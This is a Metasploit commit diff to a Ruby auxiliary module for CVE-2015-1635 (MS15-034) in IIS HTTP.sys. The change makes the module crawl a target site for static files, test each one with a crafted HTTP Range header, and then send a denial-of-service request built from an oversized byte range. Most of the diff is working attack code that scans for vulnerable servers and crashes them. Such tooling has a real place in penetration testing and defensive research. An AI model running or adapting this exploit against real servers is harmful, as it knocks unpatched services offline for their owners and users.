Land rapid7#5386, automatically find file for ms15_034

wchen-r7 · wchen-r7 · commit 068198c98078 · 2015-05-28T14:52:31.000-05:00
diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
@@ -19,10 +19,6 @@ def initialize(info = {})
         This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a
         vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code
         execution. This module will try to cause a denial-of-service.
-
-        Please note that a valid file resource must be supplied for the TARGETURI option.
-        By default, IIS provides 'welcome.png' and 'iis-85.png' as resources.
-        Others may also exist, depending on configuration options.
       },
       'Author'         =>
         [
@@ -46,7 +42,7 @@ def initialize(info = {})
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'A valid file resource', '/welcome.png'])
+        OptString.new('TARGETURI', [false, 'URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)', '/'])
       ], self.class)
 
     deregister_options('RHOST')
@@ -60,34 +56,38 @@ def run_host(ip)
     if check_host(ip) == Exploit::CheckCode::Vulnerable
       dos_host(ip)
     else
-      print_status("#{ip}:#{rport} - Probably not vulnerable, will not dos it.")
+      print_status("#{peer} - Probably not vulnerable, will not dos it.")
     end
   end
 
+  # Needed to allow the vulnerable uri to be shared between the #check and #dos
+  def target_uri
+    @target_uri ||= super
+  end
+
   def get_file_size(ip)
     @file_size ||= lambda {
       file_size = -1
       uri = normalize_uri(target_uri.path)
-      res = send_request_raw({'uri'=>uri})
+      res = send_request_raw('uri' => uri)
 
       unless res
-        vprint_error("#{ip}:#{rport} - Connection timed out")
+        vprint_error("#{peer} - Connection timed out")
         return file_size
       end
 
       if res.code == 404
-        vprint_error("#{ip}:#{rport} - You got a 404. URI must be a valid resource.")
+        vprint_error("#{peer} - You got a 404. URI must be a valid resource.")
         return file_size
       end
 
       file_size = res.body.length
-      vprint_status("#{ip}:#{rport} - File length: #{file_size} bytes")
+      vprint_status("#{peer} - File length: #{file_size} bytes")
 
       return file_size
     }.call
   end
 
-
   def dos_host(ip)
     file_size = get_file_size(ip)
     lower_range = file_size - 2
@@ -97,39 +97,79 @@ def dos_host(ip)
     begin
       cli = Rex::Proto::Http::Client.new(ip)
       cli.connect
-      req = cli.request_raw({
+      req = cli.request_raw(
         'uri' => uri,
         'method' => 'GET',
         'headers' => {
           'Range' => "bytes=#{lower_range}-#{upper_range}"
         }
-      })
+      )
       cli.send_request(req)
     rescue ::Errno::EPIPE, ::Timeout::Error
       # Same exceptions the HttpClient mixin catches
     end
-    print_status("#{ip}:#{rport} - DOS request sent")
+    print_status("#{peer} - DOS request sent")
   end
 
+  def potential_static_files_uris
+    uri = normalize_uri(target_uri.path)
 
-  def check_host(ip)
-    return Exploit::CheckCode::Unknown if get_file_size(ip) == -1
+    return [uri] unless uri[-1, 1] == '/'
 
-    uri = normalize_uri(target_uri.path)
-    res = send_request_raw({
-      'uri' => uri,
-      'method' => 'GET',
-      'headers' => {
-        'Range' => "bytes=0-#{upper_range}"
-      }
-    })
-    if res && res.body.include?('Requested Range Not Satisfiable')
-      return Exploit::CheckCode::Vulnerable
-    elsif res && res.body.include?('The request has an invalid header name')
-      return Exploit::CheckCode::Safe
-    else
-      return Exploit::CheckCode::Unknown
+    uris = ["#{uri}welcome.png"]
+    res  = send_request_raw('uri' => uri, 'method' => 'GET')
+
+    return uris unless res
+
+    site_uri = URI.parse(full_uri)
+    page     = Nokogiri::HTML(res.body.encode('UTF-8', invalid: :replace, undef: :replace))
+
+    page.xpath('//link|//script|//style|//img').each do |tag|
+      %w(href src).each do |attribute|
+        attr_value = tag[attribute]
+
+        next unless attr_value && !attr_value.empty?
+
+        uri = site_uri.merge(URI.encode(attr_value.strip))
+
+        next unless uri.host == vhost || uri.host == rhost
+
+        uris << uri.path if uri.path =~ /\.[a-z]{2,}$/i # Only keep path with a file
+      end
     end
+
+    uris.uniq
   end
 
+  def check_host(ip)
+    potential_static_files_uris.each do |potential_uri|
+      uri = normalize_uri(potential_uri)
+
+      res = send_request_raw(
+        'uri' => uri,
+        'method' => 'GET',
+        'headers' => {
+          'Range' => "bytes=0-#{upper_range}"
+        }
+      )
+
+      vmessage = "#{peer} - Checking #{uri} [#{res.code}]"
+
+      if res && res.body.include?('Requested Range Not Satisfiable')
+        vprint_status("#{vmessage} - Vulnerable")
+
+        target_uri.path = uri # Needed for the DoS attack
+
+        return Exploit::CheckCode::Vulnerable
+      elsif res && res.body.include?('The request has an invalid header name')
+        vprint_status("#{vmessage} - Safe")
+
+        return Exploit::CheckCode::Safe
+      else
+        vprint_status("#{vmessage} - Unknown")
+      end
+    end
+
+    Exploit::CheckCode::Unknown
+  end
 end
